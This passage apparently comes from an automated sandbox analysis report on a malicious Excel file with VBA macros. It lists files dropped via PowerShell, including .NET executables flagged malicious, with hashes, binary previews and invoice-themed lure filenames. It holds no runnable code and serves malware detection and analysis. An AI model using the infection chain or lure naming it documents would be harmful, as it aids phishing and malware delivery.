                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                        Category:dropped
                                                                                        Size (bytes):58936
                                                                                        Entropy (8bit):7.994797855729196
                                                                                        Encrypted:true
                                                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                        Malicious:false
                                                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                        C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        Process:C:\Users\user\ntrwe.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):64672
                                                                                        Entropy (8bit):6.033474133573561
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:PedoViadPL1DI9WzutSjeJan8dBhF541kE6Iq8HaVxlYDKz4yqibwEBbr:XiaFJkobMa8dBXG2zbVUDKz4yq3EBbr
                                                                                        MD5:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                        SHA1:017801B7EBD2CC0E1151EEBEC14630DBAEE48229
                                                                                        SHA-256:5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
                                                                                        SHA-512:9670AC5A10719FA312336B790EAD713D78A9999DB236AD0841A32CD689559B9F5F8469E3AF93400F1BE5BAF2B3723574F16EA554C2AAF638734FFF806F18DB2B
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: Payment_Confirmation_Slip.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Overdue Invoice.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                                        • Filename: ENCLOSE ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                        • Filename: PO INV 195167 & 195324.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Bank letter.xlsx, Detection: malicious, Browse
                                                                                        • Filename: Quotation.xlsx, Detection: malicious, Browse
                                                                                        • Filename: PO 19030004.xlsx, Detection: malicious, Browse
                                                                                        • Filename: New PO PO20.xlsx, Detection: malicious, Browse
                                                                                        • Filename: ORDER LIST.xlsx, Detection: malicious, Browse
                                                                                        • Filename: RFQ 00112.xlsx, Detection: malicious, Browse
                                                                                        • Filename: inquiry.xlsx, Detection: malicious, Browse
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.W..............0.................. ........@.. ....................... ......k.....`.....................................O.......8................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H........A..`p...........................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.;...}S......i.>...}T......i.>...}U.....+m...(....o......r]..p.o ...,..{T.......{U........o!....+(.ra..p.o ...,..{T.......
                                                                                        C:\Users\user\AppData\Local\Temp\Tar8019.tmp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):152533
                                                                                        Entropy (8bit):6.31602258454967
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                        Malicious:false
                                                                                        Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                        C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview: 1
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                                                                        Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):35006
                                                                                        Entropy (8bit):0.6024827961083986
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeR:i
                                                                                        MD5:AD0D2FB7F4EC355D0D8CBF5C9235259B
                                                                                        SHA1:C875BB3B2020FB4A1C8E6E694BA2296EBB31DF81
                                                                                        SHA-256:2598083577FF245674401A33AE940D5AE389E972B1DBB147FAA47B40156D965E
                                                                                        SHA-512:E345C2920A6F29AE14EA6181178E3F4252B20CFF01374BA47CB7A4EE80FFA749E424345D9AB03905A8818E6DE1A03917499C409DBB6DAA1D3EB3340C4AA68E9E
                                                                                        Malicious:false
                                                                                        Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\6Cprm97UTl.LNK
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 6 02:04:31 2021, mtime=Wed Jan 6 02:04:39 2021, atime=Wed Jan 6 02:04:40 2021, length=127488, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2028
                                                                                        Entropy (8bit):4.547448419157985
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:8hz//o/XTr6N47KevRDv3qpdM7dD2hz//o/XTr6N47KevRDv3qpdM7dV:8hz/A/XT+NhtpQh2hz/A/XT+NhtpQ/
                                                                                        MD5:73C3A39789CB2C2692EF7B7D1BE021AF
                                                                                        SHA1:9B6DCC9611BABA41FE6CC83D220EEEA88E69B346
                                                                                        SHA-256:F01B6D9921D1A2744419D9283E221C129FAEF7C40CB5EC09BB47D9BE6BC2992C
                                                                                        SHA-512:82003A9023EC05876BE86D273E1975488B2D62F6F0A96B39C9C358B3A98492AF2DECF7F82967C0E5BC60B1A948C88FFB0AD1DCEF49B4C7E932616065ED763196
                                                                                        Malicious:false
                                                                                        Preview: L..................F.... ....;*.....?Ir.....`my..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R....Desktop.d......QK.X&R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....&R.. .6CPRM9~1.XLS..J......&R..&R..*...?.....................6.C.p.r.m.9.7.U.T.l...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\216554\Users.user\Desktop\6Cprm97UTl.xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.6.C.p.r.m.9.7.U.T.l...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216554..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 02:04:39 2021, atime=Wed Jan 6 02:04:39 2021, length=8192, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):867
                                                                                        Entropy (8bit):4.493703650549725
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:85QSxCLgXg/XAlCPCHaX7B8NB/0VngUX+WnicvbWbDtZ3YilMMEpxRljK96TdJP8:85VxU/XTr6NqgUYeeDv3qprNru/
                                                                                        MD5:6998A322A53314E59F4908073525B31A
                                                                                        SHA1:F6A12ABF5E811E73424968267E355D9FE3FBB930
                                                                                        SHA-256:E2F9EF677017D5ED6785546BAFA65854E49111D370873CD60BD34ED2DE4A3496
                                                                                        SHA-512:9348C3E08429E03CAF5FD09B36DC46651958D817A4AA5D94C3602CC60E2A6214200D1302062D64296EF2CE41F98F29D4F2AA8F5863597AEF2C74E003AF21706E
                                                                                        Malicious:false
                                                                                        Preview: L..................F...........7G..?Ir.....?Ir...... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R....Desktop.d......QK.X&R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216554\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216554..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):83
                                                                                        Entropy (8bit):4.598856563846179
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:oyBVomMLOxFp2SDxFp2mMLOxFp2v:dj6LOFpDFoLOFI
                                                                                        MD5:E843814B96F07781747EFD43C6082AEC
                                                                                        SHA1:C2F6049FE788D4C8B5492EA8531FB23655E52BB1
                                                                                        SHA-256:7D5160CFBB0EF9CF50C2AA8430F9841E1A6FDCFBA3EAE6D9BD061D0DFEBD1AD5
                                                                                        SHA-512:BD9EC0999C17CCB13FB893D41EE45F7B1325BDDDF3AD8CC23F599889CFD48EAB515B44E71E645C3773562DD6088C0468D0BC85CE81F7BB7050454BEF4218B757
                                                                                        Malicious:false
                                                                                        Preview: Desktop.LNK=0..[xls]..6Cprm97UTl.LNK=0..6Cprm97UTl.LNK=0..[xls]..6Cprm97UTl.LNK=0..
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B0BO471L5716CBJPX3UA.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LE6CBUNRM6U6BL3TCXE0.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PXJFD74DLMN8ONH9QYBS.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\Desktop\B5DE0000
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                        Category:dropped
                                                                                        Size (bytes):152144
                                                                                        Entropy (8bit):7.1465330226768335
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:o4k3hbdlylKsgqopeJBWhZFGkE+cL2Ndhi0olgaSN4PZlsuFPOLYiR6nJE0jjavY:Lk3hbdlylKsgqopeJBWhZFVE+W2NdhiZ
                                                                                        MD5:0873A1826881700041830C5B6254A989
                                                                                        SHA1:1B3A26F038342930CF0E86AC6809DE68DCBD057F
                                                                                        SHA-256:4DB366DD1391F89E6B9628CCD197D22B3C943B41B427E6830D13F8F9508FED25
                                                                                        SHA-512:D3FAF4AD765F429398B8FAC893ED79EB4F973C3C796BA658453D54200E5495170FF50D50FD67C30991F42E2E2A996318BFA961C5469C6836ACB7B5D534F306E9
                                                                                        Malicious:false
                                                                                        Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a
                                                                                        C:\Users\user\Documents\12.exe
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):938440
                                                                                        Entropy (8bit):5.522147302514215
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV
                                                                                        MD5:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        SHA1:CB2A4711C5F192EDBDE50229D976FCC95A5A314C
                                                                                        SHA-256:DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191
                                                                                        SHA-512:FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...lt...............................L... ........@.. ....................................`.................................dL..W....`...............:............................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............8..............@..B.................L......H........'..h$......B...P................................................ .........%.....(......... 4........%.....(.........*...0..........(....t....(....t......................................-.(....t....(....t............+5.....................&.............................-.....(....t....&.1..(....t............(....t....&.......................(....t....................-.........................(....t..........(....t....&. &.(....t....&..&(....t....&.........(....t....&..
                                                                                        C:\Users\user\ntrwe.exe
                                                                                        Process:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):938440
                                                                                        Entropy (8bit):5.522147302514215
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV
                                                                                        MD5:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        SHA1:CB2A4711C5F192EDBDE50229D976FCC95A5A314C
                                                                                        SHA-256:DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191
                                                                                        SHA-512:FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...lt...............................L... ........@.. ....................................`.................................dL..W....`...............:............................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............8..............@..B.................L......H........'..h$......B...P................................................ .........%.....(......... 4........%.....(.........*...0..........(....t....(....t......................................-.(....t....(....t............+5.....................&.............................-.....(....t....&.1..(....t............(....t....&.......................(....t....................-.........................(....t..........(....t....&. &.(....t....&..&(....t....&.........(....t....&..

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Last Saved By: Dell, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Tue Jan 5 14:27:14 2021, Security: 0
                                                                                        Entropy (8bit):7.166667516407053
                                                                                        TrID:
                                                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                        File name:6Cprm97UTl.xls
                                                                                        File size:127488
                                                                                        MD5:29c8b5edc30eadf757b72b0a14857903
                                                                                        SHA1:77d432fb96a0a453bae30107990c2c9ee0314330
                                                                                        SHA256:a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0
                                                                                        SHA512:f3e796ac54c7f64a01aca3ea2ae9c886e11ffdbc103024f34a19fdf4c07a58756375a9b60c4635cfb0790b82339147bf975303cd5f1f1fcbe8e2650d2c85f408
                                                                                        SSDEEP:3072:U4k3hbdlylKsgqopeJBWhZFGkE+cL2Nd+ioo1gaSNAPZlsWFPO7YiR6PJEcjjaPY:Xk3hbdlylKsgqopeJBWhZFVE+W2Nd+id
                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                        File Icon

                                                                                        Icon Hash:e4eea286a4b4bcb4

                                                                                        Static OLE Info

                                                                                        General

                                                                                        Document Type:OLE
                                                                                        Number of OLE Files:1

                                                                                        OLE File "6Cprm97UTl.xls"

                                                                                        Indicators

                                                                                        Has Summary Info:True
                                                                                        Application Name:unknown
                                                                                        Encrypted Document:False
                                                                                        Contains Word Document Stream:False
                                                                                        Contains Workbook/Book Stream:True
                                                                                        Contains PowerPoint Document Stream:False
                                                                                        Contains Visio Document Stream:False
                                                                                        Contains ObjectPool Stream:
                                                                                        Flash Objects Count:
                                                                                        Contains VBA Macros:True

                                                                                        Summary

                                                                                        Code Page:1252
                                                                                        Last Saved By:Dell
                                                                                        Create Time:2020-09-20 21:17:44
                                                                                        Last Saved Time:2021-01-05 14:27:14
                                                                                        Security:0

                                                                                        Document Summary

                                                                                        Document Code Page:1252
                                                                                        Thumbnail Scaling Desired:False
                                                                                        Contains Dirty Links:False
                                                                                        Shared Document:False
                                                                                        Changed Hyperlinks:False
                                                                                        Application Version:983040

                                                                                        Streams

                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                        General
                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                        File Type:data
                                                                                        Stream Size:4096
                                                                                        Entropy:0.232115956307
                                                                                        Base64 Encoded:False
